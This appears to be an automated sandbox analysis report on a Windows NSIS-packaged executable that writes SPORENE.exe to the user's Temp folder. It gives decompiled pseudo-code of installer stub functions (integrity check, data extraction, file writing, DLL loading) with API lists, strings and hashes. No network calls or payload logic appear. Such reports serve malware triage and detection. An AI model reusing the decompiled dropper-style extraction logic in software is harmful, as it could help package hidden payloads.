                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                						L21:
                						if(E0040140B(0) == 0) {
                							_t32 = E00403EC2(_t78, __eflags);
                							__eflags =  *0x434fa0;
                							if( *0x434fa0 != 0) {
                								_t33 = E00405672(_t32, 0);
                								__eflags = _t33;
                								if(_t33 == 0) {
                									E0040140B(1);
                									goto L33;
                								}
                								__eflags =  *0x433ecc;
                								if( *0x433ecc == 0) {
                									E0040140B(2);
                								}
                								goto L22;
                							}
                							ShowWindow( *0x42d248, 5);
                							_t39 = E0040689A("RichEd20");
                							__eflags = _t39;
                							if(_t39 == 0) {
                								E0040689A("RichEd32");
                							}
                							_t87 = L"RichEdit20W";
                							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                							__eflags = _t40;
                							if(_t40 == 0) {
                								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                								 *0x433ec4 = _t87;
                								RegisterClassW(0x433ea0);
                							}
                							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
                							E00403B3C(E0040140B(5), 1);
                							return _t44;
                						}
                						L22:
                						_t36 = 2;
                						return _t36;
                					} else {
                						_t78 =  *0x434f00;
                						 *0x433ea4 = E00401000;
                						 *0x433eb0 =  *0x434f00;
                						 *0x433eb4 = _t30;
                						 *0x433ec4 = 0x40a380;
                						if(RegisterClassW(0x433ea0) == 0) {
                							L33:
                							__eflags = 0;
                							return 0;
                						}
                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                						goto L21;
                					}
                				} else {
                					_t78 =  *(_t82 + 0x48);
                					_t92 = _t78;
                					if(_t78 == 0) {
                						goto L16;
                					}
                					_t76 = 0x432ea0;
                					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                					_t63 =  *0x432ea0; // 0x43
                					if(_t63 == 0) {
                						goto L16;
                					}
                					if(_t63 == 0x22) {
                						_t76 = 0x432ea2;
                						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                					}
                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                						L15:
                						E0040653D(_t86, E00405E0C(_t76));
                						goto L16;
                					} else {
                						_t69 = GetFileAttributesW(_t76);
                						if(_t69 == 0xffffffff) {
                							L14:
                							E00405E58(_t76);
                							goto L15;
                						}
                						_t98 = _t69 & 0x00000010;
                						if((_t69 & 0x00000010) != 0) {
                							goto L15;
                						}
                						goto L14;
                					}
                				}
                 			}

                APIs
                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                • GetUserDefaultUILanguage.KERNELBASE(00000002,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06
                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,747DFAA0), ref: 00403CED
                • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,00000000,?), ref: 00403D0B
                • LoadImageW.USER32 ref: 00403D54
                • RegisterClassW.USER32 ref: 00403D91
                • SystemParametersInfoW.USER32 ref: 00403DA9
                • CreateWindowExW.USER32 ref: 00403DDE
                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                • GetClassInfoW.USER32 ref: 00403E40
                • GetClassInfoW.USER32 ref: 00403E4D
                • RegisterClassW.USER32 ref: 00403E56
                • DialogBoxParamW.USER32 ref: 00403E75
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                 • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                 • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                 • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\SPORENE.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                • API String ID: 606308-3371946353
                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0040307D(void* __eflags, signed int _a4) {
                				DWORD* _v8;
                				DWORD* _v12;
                				void* _v16;
                				intOrPtr _v20;
                				char _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				signed int _v44;
                				long _t50;
                				void* _t53;
                				void* _t57;
                				intOrPtr* _t59;
                				long _t60;
                				long _t70;
                				signed int _t77;
                				intOrPtr _t80;
                				long _t82;
                				void* _t85;
                				signed int _t87;
                				void* _t89;
                				long _t90;
                				long _t93;
                				void* _t94;
                
                				_t82 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				 *0x434f0c = GetTickCount() + 0x3e8;
                				GetModuleFileNameW(0, 0x443800, 0x400);
                				_t89 = E0040602D(0x443800, 0x80000000, 3);
                				_v16 = _t89;
                				 *0x40a018 = _t89;
                				if(_t89 == 0xffffffff) {
                					return L"Error launching installer";
                				}
                				_t92 = L"C:\\Users\\engineer\\Desktop";
                				E0040653D(L"C:\\Users\\engineer\\Desktop", 0x443800);
                				E0040653D(0x444000, E00405E58(_t92));
                				_t50 = GetFileSize(_t89, 0);
                				 *0x42aa24 = _t50;
                				_t93 = _t50;
                				if(_t50 <= 0) {
                					L24:
                					E00403019(1);
                					if( *0x434f14 == _t82) {
                						goto L29;
                					}
                					if(_v8 == _t82) {
                						L28:
                						_t34 =  &_v24; // 0x40387d
                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                						_t94 = _t53;
                						E004034E5( *0x434f14 + 0x1c);
                						_t35 =  &_v24; // 0x40387d
                						_push( *_t35);
                						_push(_t94);
                						_push(_t82);
                						_push(0xffffffff); // executed
                						_t57 = E004032B4(); // executed
                						if(_t57 == _v24) {
                							 *0x434f10 = _t94;
                							 *0x434f18 =  *_t94;
                							if((_v44 & 0x00000001) != 0) {
                								 *0x434f1c =  *0x434f1c + 1;
                							}
                							_t40 = _t94 + 0x44; // 0x44
                							_t59 = _t40;
                							_t85 = 8;
                							do {
                								_t59 = _t59 - 8;
                								 *_t59 =  *_t59 + _t94;
                								_t85 = _t85 - 1;
                							} while (_t85 != 0);
                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                							 *(_t94 + 0x3c) = _t60;
                							E00405FE8(0x434f20, _t94 + 4, 0x40);
                							return 0;
                						}
                						goto L29;
                					}
                					E004034E5( *0x41ea18);
                					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                						goto L29;
                					} else {
                						goto L28;
                					}
                				} else {
                					do {
                						_t90 = _t93;
                						asm("sbb eax, eax");
                						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                						if(_t93 >= _t70) {
                							_t90 = _t70;
                						}
                						if(E004034CF(0x416a18, _t90) == 0) {
                							E00403019(1);
                							L29:
                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                						}
                						if( *0x434f14 != 0) {
                							if((_a4 & 0x00000002) == 0) {
                								E00403019(0);
                							}
                							goto L20;
                						}
                						E00405FE8( &_v44, 0x416a18, 0x1c);
                						_t77 = _v44;
                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                							_a4 = _a4 | _t77;
                							_t87 =  *0x41ea18; // 0x1ffd3
                							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                							_t80 = _v20;
                							 *0x434f14 = _t87;
                							if(_t80 > _t93) {
                								goto L29;
                							}
                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                								_v8 = _v8 + 1;
                								_t93 = _t80 - 4;
                								if(_t90 > _t93) {
                									_t90 = _t93;
                								}
                								goto L20;
                							} else {
                								break;
                							}
                						}
                						L20:
                						if(_t93 <  *0x42aa24) {
                							_v12 = E004069F7(_v12, 0x416a18, _t90);
                						}
                						 *0x41ea18 =  *0x41ea18 + _t90;
                						_t93 = _t93 - _t90;
                					} while (_t93 != 0);
                					_t82 = 0;
                					goto L24;
                				}
                 			}

                APIs
                • GetTickCount.KERNEL32 ref: 0040308E
                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                • API String ID: 2803837635-1700931469
                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                				signed int _v8;
                				int _v12;
                				intOrPtr _v16;
                				long _v20;
                				intOrPtr _v24;
                				short _v152;
                				void* _t65;
                				long _t70;
                				intOrPtr _t75;
                				long _t76;
                				void* _t78;
                				int _t88;
                				intOrPtr _t92;
                				intOrPtr _t95;
                				long _t96;
                				signed int _t97;
                				int _t98;
                				int _t99;
                				void* _t101;
                				void* _t102;
                
                				_t97 = _a16;
                				_t92 = _a12;
                				_v12 = _t97;
                				if(_t92 == 0) {
                					_v12 = 0x8000;
                				}
                				_v8 = _v8 & 0x00000000;
                				_v16 = _t92;
                				if(_t92 == 0) {
                					_v16 = 0x422a20;
                				}
                				_t62 = _a4;
                				if(_a4 >= 0) {
                					E004034E5( *0x434f58 + _t62);
                				}
                				if(E004034CF( &_a16, 4) == 0) {
                					L41:
                					_push(0xfffffffd);
                					goto L42;
                				} else {
                					if((_a19 & 0x00000080) == 0) {
                						if(_t92 != 0) {
                							if(_a16 < _t97) {
                								_t97 = _a16;
                							}
                							if(E004034CF(_t92, _t97) != 0) {
                								_v8 = _t97;
                								L44:
                								return _v8;
                							} else {
                								goto L41;
                							}
                						}
                						if(_a16 <= _t92) {
                							goto L44;
                						}
                						_t88 = _v12;
                						while(1) {
                							_t98 = _a16;
                							if(_a16 >= _t88) {
                								_t98 = _t88;
                							}
                							if(E004034CF(0x41ea20, _t98) == 0) {
                								goto L41;
                							}
                							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                								L28:
                								_push(0xfffffffe);
                								L42:
                								_pop(_t65);
                								return _t65;
                							}
                							_v8 = _v8 + _t98;
                							_a16 = _a16 - _t98;
                							if(_a16 > 0) {
                								continue;
                							}
                							goto L44;
                						}
                						goto L41;
                					}
                					_t70 = GetTickCount();
                					 *0x40d384 =  *0x40d384 & 0x00000000;
                					 *0x40d380 =  *0x40d380 & 0x00000000;
                					_t14 =  &_a16;
                					 *_t14 = _a16 & 0x7fffffff;
                					_v20 = _t70;
                					 *0x40ce68 = 8;
                					 *0x416a10 = 0x40ea08;
                					 *0x416a0c = 0x40ea08;
                					 *0x416a08 = 0x416a08;
                					_a4 = _a16;
                					if( *_t14 <= 0) {
                						goto L44;
                					} else {
                						goto L9;
                					}
                					while(1) {
                						L9:
                						_t99 = 0x4000;
                						if(_a16 < 0x4000) {
                							_t99 = _a16;
                						}
                						if(E004034CF(0x41ea20, _t99) == 0) {
                							goto L41;
                						}
                						_a16 = _a16 - _t99;
                						 *0x40ce58 = 0x41ea20;
                						 *0x40ce5c = _t99;
                						while(1) {
                							_t95 = _v16;
                							 *0x40ce60 = _t95;
                							 *0x40ce64 = _v12;
                							_t75 = E00406A65(0x40ce58);
                							_v24 = _t75;
                							if(_t75 < 0) {
                								break;
                							}
                							_t101 =  *0x40ce60 - _t95;
                							_t76 = GetTickCount();
                							_t96 = _t76;
                							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                								_t102 = _t102 + 0xc;
                								E0040559F(0,  &_v152);
                								_v20 = _t96;
                							}
                							if(_t101 == 0) {
                								if(_a16 > 0) {
                									goto L9;
                								}
                								goto L44;
                							} else {
                								if(_a12 != 0) {
                									_v8 = _v8 + _t101;
                									_v12 = _v12 - _t101;
                									_v16 =  *0x40ce60;
                									L23:
                									if(_v24 != 1) {
                										continue;
                									}
                									goto L44;
                								}
                								_t78 = E004060DF(_a8, _v16, _t101); // executed
                								if(_t78 == 0) {
                									goto L28;
                								}
                								_v8 = _v8 + _t101;
                								goto L23;
                							}
                						}
                						_push(0xfffffffc);
                						goto L42;
                					}
                					goto L41;
                				}
                 			}

                APIs
                Strings
                • }8@, xrefs: 004032B4
                • ... %d%%, xrefs: 004033FB
                • UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU, xrefs: 00403374, 0040337A, 0040347E, 00403484, 0040348F
                • *B, xrefs: 004032DF
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: *B$... %d%%$UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU$}8@
                • API String ID: 551687249-1562186087
                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0040176F(FILETIME* __ebx, void* __eflags) {
                				void* __esi;
                				void* _t35;
                				void* _t43;
                				void* _t45;
                				FILETIME* _t51;
                				FILETIME* _t64;
                				void* _t66;
                				signed int _t72;
                				FILETIME* _t73;
                				FILETIME* _t77;
                				signed int _t79;
                				WCHAR* _t81;
                				void* _t83;
                				void* _t84;
                				void* _t86;
                
                				_t77 = __ebx;
                				 *(_t86 - 8) = E00402DA6(0x31);
                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                				_t35 = E00405E83( *(_t86 - 8));
                				_push( *(_t86 - 8));
                				_t81 = L"C:\\Users";
                				if(_t35 == 0) {
                					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                				} else {
                					E0040653D();
                				}
                				E004067C4(_t81);
                				while(1) {
                					__eflags =  *(_t86 + 8) - 3;
                					if( *(_t86 + 8) >= 3) {
                						_t66 = E00406873(_t81);
                						_t79 = 0;
                						__eflags = _t66 - _t77;
                						if(_t66 != _t77) {
                							_t73 = _t66 + 0x14;
                							__eflags = _t73;
                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                						}
                						asm("sbb eax, eax");
                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                						__eflags = _t72;
                						 *(_t86 + 8) = _t72;
                					}
                					__eflags =  *(_t86 + 8) - _t77;
                					if( *(_t86 + 8) == _t77) {
                						E00406008(_t81);
                					}
                					__eflags =  *(_t86 + 8) - 1;
                					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                					__eflags = _t43 - 0xffffffff;
                					 *(_t86 - 0x38) = _t43;
                					if(_t43 != 0xffffffff) {
                						break;
                					}
                					__eflags =  *(_t86 + 8) - _t77;
                					if( *(_t86 + 8) != _t77) {
                						E0040559F(0xffffffe2,  *(_t86 - 8));
                						__eflags =  *(_t86 + 8) - 2;
                						if(__eflags == 0) {
                							 *((intOrPtr*)(_t86 - 4)) = 1;
                						}
                						L31:
                						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                						__eflags =  *0x434f88;
                						goto L32;
                					} else {
                						E0040653D(0x40b5f0, _t83);
                						E0040653D(_t83, _t81);
                						E0040657A(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                						E0040653D(_t83, 0x40b5f0);
                						_t64 = E00405B9D("C:\Users\engineer\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                						__eflags = _t64;
                						if(_t64 == 0) {
                							continue;
                						} else {
                							__eflags = _t64 == 1;
                							if(_t64 == 1) {
                								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                								L32:
                								_t51 = 0;
                								__eflags = 0;
                							} else {
                								_push(_t81);
                								_push(0xfffffffa);
                								E0040559F();
                								L29:
                								_t51 = 0x7fffffff;
                							}
                						}
                					}
                					L33:
                					return _t51;
                				}
                				E0040559F(0xffffffea,  *(_t86 - 8));
                				 *0x434fb4 =  *0x434fb4 + 1;
                				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                				 *0x434fb4 =  *0x434fb4 - 1;
                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                				_t84 = _t45;
                				if( *(_t86 - 0x24) != 0xffffffff) {
                					L22:
                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                				} else {
                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                						goto L22;
                					}
                				}
                				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                				__eflags = _t84 - _t77;
                				if(_t84 >= _t77) {
                					goto L31;
                				} else {
                					__eflags = _t84 - 0xfffffffe;
                					if(_t84 != 0xfffffffe) {
                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                					} else {
                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                						lstrcatW(_t81,  *(_t86 - 8));
                					}
                					_push(0x200010);
                					_push(_t81);
                					E00405B9D();
                					goto L29;
                				}
                				goto L33;
                 			}

                APIs
                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\SPORENE.exe
                • API String ID: 1941528284-667802854
                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040689A(intOrPtr _a4) {
                				short _v576;
                				signed int _t13;
                				struct HINSTANCE__* _t17;
                				signed int _t19;
                				void* _t24;
                
                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                				if(_t13 > 0x104) {
                					_t13 = 0;
                				}
                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                					_t19 = 1;
                				} else {
                					_t19 = 0;
                				}
                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                				return _t17;
                 			}

                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                • wsprintfW.USER32 ref: 004068EC
                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%S.dll$UXTHEME$\
                • API String ID: 2200240437-1946221925
                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00401C43(intOrPtr __edx) {
                				int _t29;
                				long _t30;
                				signed int _t32;
                				WCHAR* _t35;
                				long _t36;
                				int _t41;
                				signed int _t42;
                				int _t46;
                				int _t56;
                				intOrPtr _t57;
                				struct HWND__* _t63;
                				void* _t64;
                
                				_t57 = __edx;
                				_t29 = E00402D84(3);
                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                				 *(_t64 - 0x18) = _t29;
                				_t30 = E00402D84(4);
                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                				 *(_t64 + 8) = _t30;
                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                				}
                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                					 *(_t64 + 8) = E00402DA6(0x44);
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                				_push(1);
                				if(__eflags != 0) {
                					_t61 = E00402DA6();
                					_t32 = E00402DA6();
                					asm("sbb ecx, ecx");
                					asm("sbb eax, eax");
                					_t35 =  ~( *_t31) & _t61;
                					__eflags = _t35;
                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                					goto L10;
                				} else {
                					_t63 = E00402D84();
                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                					_t41 = E00402D84(2);
                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                					_t56 =  *(_t64 - 0x1c) >> 2;
                					if(__eflags == 0) {
                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                						L10:
                						 *(_t64 - 0x38) = _t36;
                					} else {
                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                						asm("sbb eax, eax");
                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                					}
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                					_push( *(_t64 - 0x38));
                					E00406484();
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                				return 0;
                 			}

                APIs
                • SendMessageTimeoutW.USER32 ref: 00401CB3
                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                Uniqueness

                Uniqueness Score: -1.00%

